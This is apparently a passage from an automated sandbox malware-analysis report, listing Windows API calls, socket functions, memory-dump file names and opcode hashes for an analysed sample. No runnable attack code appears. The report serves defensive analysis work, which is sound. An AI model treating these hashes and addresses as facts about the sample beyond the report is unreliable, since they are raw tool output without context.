                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00F00CE0,00000000,00000001,00F00B50,?), ref: 00ED61FE
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00ED621C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                                                                      • API String ID: 3769357847-24824748
                                                                                                                                                                                                                                      • Opcode ID: 8e8ab057cc86d676f2b8c39580327140ee32b0d87d4d8991a5af76f249c62ab2
                                                                                                                                                                                                                                      • Instruction ID: c63824805719dcd05b9e0f1da58077f953c3399b9139ee8a97d77bae6f21b2eb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e8ab057cc86d676f2b8c39580327140ee32b0d87d4d8991a5af76f249c62ab2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBD146716082119FC704DF25D884A2ABBF5FF89758F14585EF889AB361CB31EC46CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?,?,?,Listbox,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00EF40A5
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EF40B5
                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EF40DB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                      • String ID: Listbox
                                                                                                                                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                      • Opcode ID: b005a267eda95ba3d4bd74b039dbe23bd34d589669440bff8a3f9fc6237e2453
                                                                                                                                                                                                                                      • Instruction ID: c53afd0049583b06a63dc5ecc6bf70c175a4db5dd69a41499d2708d99513b80c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b005a267eda95ba3d4bd74b039dbe23bd34d589669440bff8a3f9fc6237e2453
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A21B07260011CBBEF128F54DC45FBB3BAEEB89754F009115FB14AB1D0CA719C5197A1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • #23.WSOCK32(00000002,00000002,00000011), ref: 00EE2356
                                                                                                                                                                                                                                      • #111.WSOCK32 ref: 00EE2364
                                                                                                                                                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EE23E3
                                                                                                                                                                                                                                      • #111.WSOCK32 ref: 00EE23ED
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: #111
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 568940515-0
                                                                                                                                                                                                                                      • Opcode ID: a81dd3e2d0ceb29a06d96b7e87a1e1c2402c2cf02dc1d26f5ef4fce5137b1141
                                                                                                                                                                                                                                      • Instruction ID: effa84745074839a59ccd724b10256177b7663e730db94694599724daac23e65
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a81dd3e2d0ceb29a06d96b7e87a1e1c2402c2cf02dc1d26f5ef4fce5137b1141
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7541F234600204AFE720AF25D886F2A77D9AF44348F54D45CFA5AAF2D2D772ED42CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EC20D1
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000,?,000000B0,?,?), ref: 00EC20E3
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000B0,?,?), ref: 00EC20F9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000B0,?,?), ref: 00EC2114
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      • Opcode ID: c449d415b79ae00f159ee90539da0281286ce3b56b0cda5fc38655030fa9b777
                                                                                                                                                                                                                                      • Instruction ID: 9cfd2b72c549d3f914d863279cebc1e97e9738530aee7a09ac6ea4b064ebd8a5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c449d415b79ae00f159ee90539da0281286ce3b56b0cda5fc38655030fa9b777
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D11393A901218FFEF119BA4CD85F9DFBB8FB08750F240099EA00B7290D6716E11DB94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?), ref: 00E841EE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EncodePointer
                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                      • Opcode ID: 90d5cf3369bc0b22946b18d122e27fb18416321af4c507ca0ed7e0f71e9369f6
                                                                                                                                                                                                                                      • Instruction ID: dae5ea22739be83c1c909a5dc7e807c2f48fabe065fd146a5d1c1c30b74fab17
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90d5cf3369bc0b22946b18d122e27fb18416321af4c507ca0ed7e0f71e9369f6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 183158B190421AAFDF11EF54C841AADB7B5FF08318F195199F91C772A1C334AE60CB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC4337: GetClassNameW.USER32(?,?,000000FF), ref: 00EC435A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?,?,?,ListBox,?,?,ComboBox), ref: 00EC23D6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 3678867486-1403004172
                                                                                                                                                                                                                                      • Opcode ID: aab63ff570a794e2020055f7444810118fe6d0fb25afcb446bf1dd3417f9b893
                                                                                                                                                                                                                                      • Instruction ID: 9e094f38501f31aff93797aa39af3f8a0e072b2098aceb0bc3628bdc1ede42b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aab63ff570a794e2020055f7444810118fe6d0fb25afcb446bf1dd3417f9b893
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92014971A40215ABCB04A768CC61EFE37A8EB92354B00261DF932773C1DB36880E8610
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC4337: GetClassNameW.USER32(?,?,000000FF), ref: 00EC435A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?,?,?,ListBox,?,?,ComboBox), ref: 00EC22D0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 3678867486-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 61cc7d4088528e34f636c567412242e2f68497a19ebdadf4dac9da0113425473
                                                                                                                                                                                                                                      • Instruction ID: 668e9dae5a459d9c19963abc806193e365ef94ffcf7bc1686ca51655fc95d7bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61cc7d4088528e34f636c567412242e2f68497a19ebdadf4dac9da0113425473
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2701F7B5A401086BCB18E790CE22FFE77E89B55384F14202DB902B72D5DE129E0E9671
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC4337: GetClassNameW.USER32(?,?,000000FF), ref: 00EC435A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000,?,?,ListBox,?,?,ComboBox), ref: 00EC2352
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 3678867486-1403004172
                                                                                                                                                                                                                                      • Opcode ID: da5372580cfb55150481474623dad75fc526e9b81d6ea9fd839917df4216b23f
                                                                                                                                                                                                                                      • Instruction ID: bdaf7dc6bac9f205fc088ff96cf8f40e682e9e7dfe2a9a5ae26a7f45673a1d48
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da5372580cfb55150481474623dad75fc526e9b81d6ea9fd839917df4216b23f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD01DBB5A4014966CB00E758DA12FFF77ECAB11744F14201D7902B72C1DE26CE0E9671
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC4337: GetClassNameW.USER32(?,?,000000FF), ref: 00EC435A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000,?,?,ListBox,?,?,ComboBox), ref: 00EC245D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 3678867486-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 6b8c640e7cf770e8c82dbb07f8d3ad386b0a7461e63f60be5468c986af9e0767
                                                                                                                                                                                                                                      • Instruction ID: b00312a63601c5d57ee519cf81c476e8d0f90763078dabb6429d10cf51302977
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b8c640e7cf770e8c82dbb07f8d3ad386b0a7461e63f60be5468c986af9e0767
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5F0F9B1E4021467CB08E7649C51FFE77B8BB01744F04251DB971B72C1DF61980E8660
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00E9C113
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00E9C121
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E9C17C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                                                                                                                      • Opcode ID: 3f1f7d29a59ffb65e6f91c406d48ec783d8e863898aff9ee621d994319cd780a
                                                                                                                                                                                                                                      • Instruction ID: d1902c9da5198e45d9e68c00d068c96aeebf6465856e920b54f1d0a1027714b9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f1f7d29a59ffb65e6f91c406d48ec783d8e863898aff9ee621d994319cd780a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB41C330602205AFDF25AF66CC44BAA7BB5EF41758F346169F859B7192DB308D01CB64
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%